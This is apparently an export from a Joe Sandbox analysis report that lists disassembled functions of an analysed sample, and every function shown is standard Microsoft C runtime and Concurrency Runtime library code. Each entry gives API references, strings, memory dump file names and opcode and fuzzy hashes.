Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 000F0EFA
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 000F0F4E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 000F0F7B
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 000F0FD1

Strings

(, xrefs: 000F0E32

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 9023fcb80b554c5af867bc04060d6ab91d92d11131549a30845ba2f09c1fb2f3
Instruction ID: e1f466f8970ee203cc24b5eb09ae79222ff53f20b23f3b1ec2b12e42543dac89
Opcode Fuzzy Hash: 9023fcb80b554c5af867bc04060d6ab91d92d11131549a30845ba2f09c1fb2f3
Instruction Fuzzy Hash: 34B15C70A00619EFDB28CF58D980A7EB7F5FB44700F14456DEA45ABA52D730ED81EB90

Function 000F1512 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000F2C0C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 000F2C1F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 000F1524

Part of subcall function 000F2D1F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 000F2D49
Part of subcall function 000F2D1F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 000F2DB8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 000F1656
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 000F16B6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 000F16C2
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 000F16FD
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 000F171E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 000F172A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 000F1733
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 000F174B

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 1666815bc3134bb2356f5fc00787815bb35d738f2d9eb20c65cf4291e029029f
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: 2E813971A00629DFCB18DFA8C5849BDB7F6BF88704B1546ADD505ABB02C770ED52EB80

Function 000FEB58 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 000FEB91

Part of subcall function 000F8E3F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 000F8E60

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 000FEBF7
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 000FEC0F
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 000FEC1C

Part of subcall function 000FE6BF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 000FE6E7
Part of subcall function 000FE6BF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 000FE77F
Part of subcall function 000FE6BF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 000FE789
Part of subcall function 000FE6BF: Concurrency::location::_Assign.LIBCMT ref: 000FE7BD
Part of subcall function 000FE6BF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 000FE7C5

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 5dda9da7fa9e696ffbea12b581a2f74e08476e06f56876d383ffb16c2e9ba606
Instruction ID: dcc9256b1d8352f6accef5119b3b05613b59fee28a80d54dff9bab1e13e08e07
Opcode Fuzzy Hash: 5dda9da7fa9e696ffbea12b581a2f74e08476e06f56876d383ffb16c2e9ba606
Instruction Fuzzy Hash: A3518231A00249EFCF24DF54C895BBEB775AF44710F1540A9EA067B7A2CB71AE02DB91

Function 001123B7 Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00112439
_free.LIBCMT ref: 0011245D
_free.LIBCMT ref: 001125EA
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00126748), ref: 001125FC
_free.LIBCMT ref: 001127B6

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 5179af65b214d8534a1897639dbdb98e02deee8aee3f0e0af498d668b78cbddb
Instruction ID: f8bc7bd1878889c8e32fdee0e2da5c6415c807b72f131161065fcc2e4ad88250
Opcode Fuzzy Hash: 5179af65b214d8534a1897639dbdb98e02deee8aee3f0e0af498d668b78cbddb
Instruction Fuzzy Hash: C6C14671A04205AFDB2C9F68DC91AEE7BFAEF65310F254179E89097281E7708ED2C750

Function 000ECA9A Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 000ECAAD

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: 9ffaa5259c7faf416dbdb43112572917e49b6bbbe712e6d41302ea0fb308c67d
Instruction ID: 500fb34cb4484edba1ac912ef89aacabcee1719c45a9f3c364d8bd664a3db61e
Opcode Fuzzy Hash: 9ffaa5259c7faf416dbdb43112572917e49b6bbbe712e6d41302ea0fb308c67d
Instruction Fuzzy Hash: 83B09232A139348B8A666B54BC0899D67569B88E6131A1266D801A76248A101C828BD1

Function 000EEF38 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 000EF1CB

Strings

pEvents, xrefs: 000EF1C3

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pEvents
API String ID: 2141394445-2498624650
Opcode ID: 39ce468c175135c97aaad7a913adaac8525d7cbbda087b8809b1e71d7c922b70
Instruction ID: fc4cf6839086e8b4b09a79e54a108ea6e90a2cbbb8691da0d851bc98a5f80a77
Opcode Fuzzy Hash: 39ce468c175135c97aaad7a913adaac8525d7cbbda087b8809b1e71d7c922b70
Instruction Fuzzy Hash: 9581AD31E0029ADFCF24DFAAC985BFEB7B5AF44310F144569E405B7282DB70A945CB51

Function 000ECF2C Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00135690,00000FA0,?,?,000ECF0A), ref: 000ECF38
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,000ECF0A), ref: 000ECF43
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,000ECF0A), ref: 000ECF54
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000ECF66
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000ECF74
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000ECF0A), ref: 000ECF97
___scrt_fastfail.LIBCMT ref: 000ECFA8
RtlDeleteCriticalSection.NTDLL(00135690), ref: 000ECFB3
CloseHandle.KERNEL32(00000000,?,?,000ECF0A), ref: 000ECFC3

Strings

kernel32.dll, xrefs: 000ECF4F
WakeAllConditionVariable, xrefs: 000ECF6C
api-ms-win-core-synch-l1-2-0.dll, xrefs: 000ECF3E
SleepConditionVariableCS, xrefs: 000ECF60

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: 48aed21cd19779965cc048f7db75da0f57b0abc75716564dd6e41c0e912f6653
Instruction ID: 8669475245dc18548e396b155f4ba81755d0d6a23bc87381d547b58b6f75be1d
Opcode Fuzzy Hash: 48aed21cd19779965cc048f7db75da0f57b0abc75716564dd6e41c0e912f6653
Instruction Fuzzy Hash: 1601FCB1640B11BFF7725F72BC0EF5A36DADB49F40B450221FC04E2551DB70C8A28A64

Function 001025DE Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 001025F0

Part of subcall function 001023EE: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00102411

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00102611
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 0010261E
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0010266C
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 001026F3
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00102706
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00102753

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 421dd90dde736d0df8ed634e5ed8d37fb04675490325da1ac201f1ad65ae58ec
Instruction ID: 1b5646d20f25305a82c7ad0adbb4a97f93639fa156fe115d68bbf049baadccf0
Opcode Fuzzy Hash: 421dd90dde736d0df8ed634e5ed8d37fb04675490325da1ac201f1ad65ae58ec
Instruction Fuzzy Hash: 4581EF34900249ABDF16DF54C988BFE7BB6AF55304F044099FC802B2D2C7B68D69DB61

Function 000F43EE Relevance: 21.2, APIs: 14, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 000F4448

Part of subcall function 000F4229: RtlInitializeSListHead.NTDLL(?), ref: 000F42F5
Part of subcall function 000F4229: RtlInitializeSListHead.NTDLL(?), ref: 000F42FF

ListArray.LIBCONCRT ref: 000F447C
Hash.LIBCMT ref: 000F44E5
Hash.LIBCMT ref: 000F44F5
RtlInitializeSListHead.NTDLL(?), ref: 000F458A
RtlInitializeSListHead.NTDLL(?), ref: 000F4597
RtlInitializeSListHead.NTDLL(?), ref: 000F45A4
RtlInitializeSListHead.NTDLL(?), ref: 000F45B1

Part of subcall function 000F9B51: std::bad_exception::bad_exception.LIBCMT ref: 000F9B73

RegisterWaitForSingleObject.KERNEL32(?,00000000,000F7925,?,000000FF,00000000), ref: 000F4639
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 000F465B
GetLastError.KERNEL32(000F539B,?,?,00000000,?,?), ref: 000F466D
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 000F468A

Part of subcall function 000EFABA: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,000F539B,00000008,?,000F468F,?,00000000,000F7916,?,7FFFFFFF,7FFFFFFF,00000000), ref: 000EFAD2

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 000F46B4

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 2750799244-0
Opcode ID: f0f93dd8bfdaea611a3d88378a088307f19c3e62a7e8c851bd8b32fe339bd84a
Instruction ID: 6fc2e7c0d7200b994a50d1859b37ace8b1a92e136ceb3cc224446be2c405aac3
Opcode Fuzzy Hash: f0f93dd8bfdaea611a3d88378a088307f19c3e62a7e8c851bd8b32fe339bd84a
Instruction Fuzzy Hash: E88161B0A11A56BFD714DF74C845BE9FBA8BF09700F00421AF528D7682CBB4A564DBD1

Function 000F2742 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 000F2751

Part of subcall function 000F3A3C: GetVersionExW.KERNEL32(?), ref: 000F3A60
Part of subcall function 000F3A3C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 000F3AFF

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 000F2765
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 000F2786
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 000F27EF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 000F2823

Part of subcall function 000F06FD: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 000F071D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 000F28A3

Part of subcall function 000F226C: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 000F2280

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 000F28EB

Part of subcall function 000F06D2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 000F06EE

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 000F28FF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 000F2910
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 000F295D
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 000F2982
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 000F298E

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: 8f355a6f0a0c74607a034a4485e0637ebb00a6dda96e31496a314bd228cc95d0
Instruction ID: c6415c96ea83725ae1ae42a9ddc30a007db3b3ab70545b36e5eea25865cd0d5e
Opcode Fuzzy Hash: 8f355a6f0a0c74607a034a4485e0637ebb00a6dda96e31496a314bd228cc95d0
Instruction Fuzzy Hash: 3A810231A0561EDBCB18DFA8D8D05BDBBF2FB88304B68412DD681E7E41DB709985EB50

Function 0010F1FF Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0010F243

Part of subcall function 0010EDDC: _free.LIBCMT ref: 0010EDF9
Part of subcall function 0010EDDC: _free.LIBCMT ref: 0010EE0B
Part of subcall function 0010EDDC: _free.LIBCMT ref: 0010EE1D
Part of subcall function 0010EDDC: _free.LIBCMT ref: 0010EE2F
Part of subcall function 0010EDDC: _free.LIBCMT ref: 0010EE41
Part of subcall function 0010EDDC: _free.LIBCMT ref: 0010EE53
Part of subcall function 0010EDDC: _free.LIBCMT ref: 0010EE65
Part of subcall function 0010EDDC: _free.LIBCMT ref: 0010EE77
Part of subcall function 0010EDDC: _free.LIBCMT ref: 0010EE89
Part of subcall function 0010EDDC: _free.LIBCMT ref: 0010EE9B
Part of subcall function 0010EDDC: _free.LIBCMT ref: 0010EEAD
Part of subcall function 0010EDDC: _free.LIBCMT ref: 0010EEBF
Part of subcall function 0010EDDC: _free.LIBCMT ref: 0010EED1

_free.LIBCMT ref: 0010F238

Part of subcall function 0010AC95: HeapFree.KERNEL32(00000000,00000000,?,0010EF6D,?,00000000,?,?,?,0010EF94,?,00000007,?,?,0010F396,?), ref: 0010ACAB
Part of subcall function 0010AC95: GetLastError.KERNEL32(?,?,0010EF6D,?,00000000,?,?,?,0010EF94,?,00000007,?,?,0010F396,?,?), ref: 0010ACBD

_free.LIBCMT ref: 0010F25A
_free.LIBCMT ref: 0010F26F
_free.LIBCMT ref: 0010F27A
_free.LIBCMT ref: 0010F29C
_free.LIBCMT ref: 0010F2AF
_free.LIBCMT ref: 0010F2BD
_free.LIBCMT ref: 0010F2C8
_free.LIBCMT ref: 0010F300
_free.LIBCMT ref: 0010F307
_free.LIBCMT ref: 0010F324
_free.LIBCMT ref: 0010F33C

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: d54b8a7991777d67010c609d18bfdc98a23e2a145b924cc3fd6cda2ba6a55fde
Instruction ID: 2fefcb816e04c00db861483151ffbb4dec8343e68b0d7a945d950ccfc1abc55c
Opcode Fuzzy Hash: d54b8a7991777d67010c609d18bfdc98a23e2a145b924cc3fd6cda2ba6a55fde
Instruction Fuzzy Hash: FF3159716003049FEB32AA78DA0AB5A73E9BF10310F55482DE4CADA5D1DBB4EC86CB11

Function 000EF981 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,000F3AF6), ref: 000EF98F
GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 000EF99D
GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 000EF9AB
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 000EF9D9
GetLastError.KERNEL32(?,?,?,000F3AF6), ref: 000EF9F4
GetLastError.KERNEL32(?,?,?,000F3AF6), ref: 000EFA00
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 000EFA16

Strings

SetThreadGroupAffinity, xrefs: 000EF997
kernel32.dll, xrefs: 000EF98A
GetThreadGroupAffinity, xrefs: 000EF9A3
GetCurrentProcessorNumberEx, xrefs: 000EF9CE

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 1654681794-465693683
Opcode ID: f82c3400e3785c5d7987c52ce040d0a0e9e935c255a05a3aab165fd5a1856a16
Instruction ID: 41813be78e5d35cade0b9184abefd5fd3351dc6c38b4a7b5a99025c583997d52
Opcode Fuzzy Hash: f82c3400e3785c5d7987c52ce040d0a0e9e935c255a05a3aab165fd5a1856a16
Instruction Fuzzy Hash: E101E172600352BEE3206B76BC4AABB36ECEF487407140A36F405F2863EB74C4505668

Function 0010287D Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 0010288F

Part of subcall function 001023EE: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00102411

